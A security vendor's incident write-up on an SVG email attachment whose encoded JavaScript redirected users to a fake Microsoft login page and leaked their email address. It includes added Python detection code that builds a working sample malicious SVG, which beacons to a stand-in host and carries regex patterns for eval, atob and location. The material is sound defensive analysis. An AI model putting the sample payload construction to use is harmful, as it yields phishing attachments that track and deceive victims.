SVG Phishing Email Attachment: A Recent Targeted Campaign

Erin Kuffel
April 7, 2025

Phishing attacks are deceptive by design, tweaking their process to subvert email security filters and often banking on the simple human urge to click. But browser security can be a crucial stopgap against what gets through email.

A sophisticated phishing attack recently intercepted by Keep Aware reveals the evolving tactics of threat actors. The attackers embedded malicious code within an image file that served two purposes: redirecting victims to a convincing Microsoft impersonation site while simultaneously notifying the attackers exactly which user had fallen for the trap. 

Here’s what happened and, more importantly, why it matters.

A Same-Day Registered Domain Blocked

Keep Aware blocked a user from accessing a malicious domain that had been registered mere hours earlier, intercepting the threat on the same day it was created. Although new domains can be legitimate (for example, when a developer launches a new site), they are most frequently seen in malicious campaigns.

As the screenshot below shows, the young domain impersonates Microsoft and displays a CAPTCHA to avoid being flagged as phishing by security tools and automated crawlers.

Screenshot. The malicious website is impersonating Microsoft and requires completing a CAPTCHA before a victim may move forward to a fake login page.

Screenshot. The webpage’s footer, claiming to be Microsoft, adds to its apparent legitimacy.

Had this block not occurred, the user could have interacted with the CAPTCHA, progressed to a fake Microsoft sign-in page, and handed over valuable business credentials to an attacker.

Screenshot. The fake Microsoft sign-in page following the CAPTCHA completion.

Tracing the Attack Back to an Email

Our logs reveal that the user’s browser request to this new domain directly followed the opening of an SVG file. Based on the logged file path, the image file was an Outlook email attachment.

Screenshot. Protocol (“file:///”) and file path of the SVG file shows the image file was an Outlook attachment, indicating this attack began as a phishing email.
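The log pattern described above (a file:/// open of an .svg attachment followed within seconds by a browser request to a very young domain) can be turned into a simple correlation rule. The following is an added example, not Keep Aware's code or log format; the log lines, the Outlook secure temporary folder path (Content.Outlook) and the domain-age table standing in for a WHOIS/RDAP creation-date lookup are all constructed for the demonstration.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit

# Constructed browser-telemetry lines: ISO timestamp, user, and the URL the tab loaded.
SAMPLE_LOG = """
2025-04-07T09:12:01Z user=jdoe url=file:///C:/Users/jdoe/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/ABCD1234/ACME_Wire_Transfer.svg
2025-04-07T09:12:03Z user=jdoe url=https://login-example.invalid/?e=ZW1wbG95ZWVAZXhhbXBsZS5pbnZhbGlk
2025-04-07T09:20:00Z user=asmith url=file:///C:/Users/asmith/Downloads/logo.svg
2025-04-07T09:30:00Z user=asmith url=https://portal.example.com/
""".strip().splitlines()

# Constructed stand-in for a WHOIS/RDAP lookup: hours since the domain was registered.
DOMAIN_AGE_HOURS = {"login-example.invalid": 5, "portal.example.com": 24 * 365 * 8}

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+url=(?P<url>\S+)$")


def parse_events(lines):
    """Parse log lines into (timestamp, user, url) tuples, sorted by time."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        events.append((ts, m["user"], m["url"]))
    return sorted(events)


def is_svg_file_open(url):
    """True for a local file:/// open of an .svg file (the attachment being rendered)."""
    parts = urlsplit(url)
    return parts.scheme == "file" and parts.path.lower().endswith(".svg")


def correlate(lines, window_seconds=10, young_hours=72):
    """Flag an SVG file open that is followed, for the same user, by an outbound
    http(s) request within window_seconds; annotate with domain age and whether
    the file came from Outlook's attachment folder (assumed path: Content.Outlook)."""
    events = parse_events(lines)
    alerts = []
    for i, (ts, user, url) in enumerate(events):
        if not is_svg_file_open(url):
            continue
        for ts2, user2, url2 in events[i + 1:]:
            gap = (ts2 - ts).total_seconds()
            if gap > window_seconds:
                break  # events are time-sorted, nothing later can be in the window
            if user2 != user:
                continue
            dest = urlsplit(url2)
            if dest.scheme not in ("http", "https"):
                continue
            age = DOMAIN_AGE_HOURS.get(dest.hostname)
            alerts.append({
                "user": user,
                "attachment": urlsplit(url).path,
                "outlook_attachment": "content.outlook" in url.lower(),
                "destination": dest.hostname,
                "seconds_after_open": gap,
                "domain_age_hours": age,
                "young_domain": age is not None and age < young_hours,
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOG):
        print(alert)
```

In a production pipeline the `DOMAIN_AGE_HOURS` dictionary would be replaced by a cached RDAP/WHOIS creation-date lookup, and the alert would carry enough context (attachment path, destination host, gap) for an analyst to pull the original email, as was done in this incident.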

The Targeted Email

In collaboration with our customer, we analyzed the original message and discovered it was specifically crafted for them, the target organization.

  • Subject & File Name: Both contained the business’s name, making the email seem relevant and legitimate.

  • References to a Wire Transfer: A common social-engineering tactic, leveraging financial urgency to prompt immediate action.

Screenshot. Email subject, which contains the target business’s name and references to a wire transfer.

How the SVG Did the Dirty Work

An SVG is just a vector image file, but because it’s XML-based, it can contain scripts. In this case, the attacker embedded base64-encoded JavaScript inside the SVG. When the file is opened in a browser (the default handler for an SVG attachment), the JavaScript executes and automatically redirects the user to the Microsoft impersonation site.

Code snippet of the SVG file attachment. Note the XML-based structure of the file and the use of encoded JavaScript. The redacted line is explained in the following section.

A Hidden Payload: Your Email Address

A particularly revealing detail in this SVG file is that it also included the target user’s email address—encoded as a URI parameter. This gives attackers exactly what they want—confirmation that someone took the bait. The moment the user opens the file (and triggers the redirect), the attacker’s server receives a web request containing that unique email in the URI query parameters. Even if the user didn’t ultimately hand over credentials, the attacker learned which user is “click-prone” and may keep targeting them.

Code snippet of the SVG file attachment. Note a variable’s value as a URI query parameter format, beginning with “?e=” and ending with the (redacted) target employee’s email address, base64-encoded.
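The two properties described in the last two sections (a `<script>` element whose body is base64-encoded JavaScript that redirects the browser, and a URI query parameter such as `?e=` carrying the target's base64-encoded email address) are exactly what an attachment scanner or triage script should look for. The following analyzer is an added example and not the attacker's SVG, Keep Aware's detection logic, or any product's code; the sample SVG, the host `login-example.invalid` and the address `employee@example.invalid` are constructed for the demonstration.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SVG_NS = "{http://www.w3.org/2000/svg}"
# Runs of base64 alphabet long enough to be worth decoding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# JavaScript APIs a redirect-on-open payload typically relies on.
SUSPICIOUS_API_RE = re.compile(
    r"(?:window\.|document\.)?location\b|\batob\s*\(|\beval\s*\(|document\.write|\bfetch\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# --- Constructed sample, not the real attachment from the incident ---
SAMPLE_EMAIL = "employee@example.invalid"
EMAIL_B64 = base64.b64encode(SAMPLE_EMAIL.encode()).decode()
DECODED_JS = f"window.location = 'https://login-example.invalid/?e={EMAIL_B64}';"
SAMPLE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <rect width="1" height="1" fill="white"/>
  <script type="text/javascript">
    var p = "{base64.b64encode(DECODED_JS.encode()).decode()}";
    eval(atob(p));
  </script>
</svg>"""
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'


def text_if_printable(raw):
    """Return decoded UTF-8 text if the bytes look like text, else None."""
    try:
        s = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return s if all(c.isprintable() or c in "\r\n\t" for c in s) else None


def decode_b64_candidates(text):
    """Decode every long base64 run that yields readable text (one layer only)."""
    out = []
    for m in B64_RE.finditer(text):
        try:
            s = text_if_printable(base64.b64decode(m.group(0), validate=True))
        except (binascii.Error, ValueError):
            continue
        if s:
            out.append(s)
    return out


def decode_param(value):
    """Try standard and URL-safe base64 (padding restored) on a query value."""
    padded = value + "=" * (-len(value) % 4)
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            text = text_if_printable(decoder(padded))
        except (binascii.Error, ValueError):
            text = None
        if text:
            return text
    return value


def analyze_svg(svg_text):
    """Walk the SVG's XML tree and report scripts, inline handlers, decoded payloads,
    URLs the payload reaches, and query parameters that decode to readable text."""
    root = ET.fromstring(svg_text)
    findings = {"script_count": 0, "event_attrs": [], "decoded_scripts": [],
                "suspicious_apis": set(), "urls": [], "leaked_params": {}}
    for el in root.iter():
        tag = el.tag.replace(SVG_NS, "")
        # on* attributes and javascript: hrefs execute without any <script> element.
        for name, value in el.attrib.items():
            if name.lower().startswith("on") or value.strip().lower().startswith("javascript:"):
                findings["event_attrs"].append(f"{tag}@{name}")
        if tag != "script":
            continue
        findings["script_count"] += 1
        body = "".join(el.itertext())
        decoded = decode_b64_candidates(body)
        findings["decoded_scripts"].extend(decoded)
        for code in [body] + decoded:
            findings["suspicious_apis"].update(SUSPICIOUS_API_RE.findall(code))
            for url in URL_RE.findall(code):
                findings["urls"].append(url)
                # Split the query by hand so '+' in base64 is not turned into a space.
                for pair in urlsplit(url).query.split("&"):
                    key, _, value = pair.partition("=")
                    if key:
                        findings["leaked_params"][key] = decode_param(value)
    findings["suspicious_apis"] = sorted(findings["suspicious_apis"])
    return findings


def is_suspicious(findings):
    """Executable content that redirects or reaches out means this is not just an image."""
    return bool((findings["script_count"] or findings["event_attrs"])
                and (findings["urls"] or findings["suspicious_apis"]))


if __name__ == "__main__":
    print(analyze_svg(SAMPLE_SVG))
```

Run against the constructed sample, the analyzer decodes the script body back to the redirect, recovers the destination host, and turns the `e` parameter back into the targeted address, which is what an analyst needs to know whose mailbox was hit and whether the beacon fired. The same logic applied to a mail gateway's attachment stream would catch this class of SVG before a browser ever renders it.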

Why This Matters

  1. Attackers Are Getting Creative
    Phishing used to rely on overly suspicious links or attachments. Now, attackers leverage file types like SVG—commonly overlooked as a harmless image—to execute hidden code.

  2. Attacker Feedback Loop, Increased Risk
    Even if the victim doesn’t enter credentials, the attacker still gains valuable information: this user opened the file, so they might be an easy target for future or more advanced phishing attempts. In other words, users who click are at an increased risk of future phishing attacks.

  3. Defense-In-Depth Is Essential
    In this incident, the target organization’s email security labeled the message as 100% malicious but still let it slip through—demonstrating that no single layer of security is foolproof. A multi-layered approach that includes the browser dramatically reduces risk. And the earlier an attack can be stopped in its tracks, the less damage an organization faces.

Conclusion

This incident underscores just how inventive modern phishing attacks can be—and how browser security contributes to a strong, multilayered defense strategy. While some security filters may catch certain red flags, attackers constantly refine their methods to bypass automated detection. As we saw here, a simple image file can hide complex, personalized code that directs a victim to a malicious website and informs the attacker as to which users click malicious files. 

Ultimately, catching threats early is the best way to keep your employees and data out of an attacker’s reach. By sharing this incident and its details, we hope to underscore the importance of layered security and the positive impact of browser security. 
